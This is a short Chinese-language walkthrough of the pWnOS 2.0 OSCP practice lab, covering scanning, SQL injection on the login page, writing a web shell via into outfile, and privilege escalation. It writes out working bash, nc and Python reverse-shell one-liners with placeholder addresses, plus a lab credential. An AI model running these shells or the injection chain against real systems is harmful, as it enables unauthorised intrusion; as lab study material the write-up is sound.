pWnOS 2.0

目标IP 10.10.10.100 需要把NAT设置改为10.0网段

pWnOS 2.0_第1张图片

开放的端口只有两个

22 版本没有可利用漏洞 可以爆破

80 apache暂无可用exp 扫描目录

pWnOS 2.0_第2张图片

网页中有两个与数据库进行数据交互的地方 注册和登录

进行sql注入测试

登陆页面存在注入 获取登陆密码 登陆后没有有用的信息

pWnOS 2.0_第3张图片

pWnOS 2.0_第4张图片

@isints:killerbeesareflying

pWnOS 2.0_第5张图片

尝试使用load_file函数和into oufile 来读写文件

pWnOS 2.0_第6张图片

上传一句话

pWnOS 2.0_第7张图片

命令执行

pWnOS 2.0_第8张图片

在这里我尝试使用了bash和nc的反弹shell都没有成功

直到使用python的反弹shell才获取到

bash: bash -i >& /dev/tcp/ip/port 0>&1

nc: nc -e /bin/sh ip port 

python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

使用python的反弹shell

pWnOS 2.0_第9张图片

开始提权

提权的前提也要收集信息 

pWnOS 2.0_第10张图片

登陆失败

pWnOS 2.0_第11张图片

这里就直接登录成功了

pWnOS 2.0_第12张图片

你可能感兴趣的:(OSCP靶机)